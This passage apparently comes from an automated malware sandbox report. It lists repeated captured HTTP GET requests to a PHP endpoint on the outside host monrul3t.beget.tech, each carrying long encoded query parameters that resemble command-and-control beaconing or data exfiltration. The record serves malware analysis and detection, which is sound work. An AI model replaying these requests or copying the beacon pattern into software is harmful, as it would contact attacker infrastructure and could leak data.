VCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
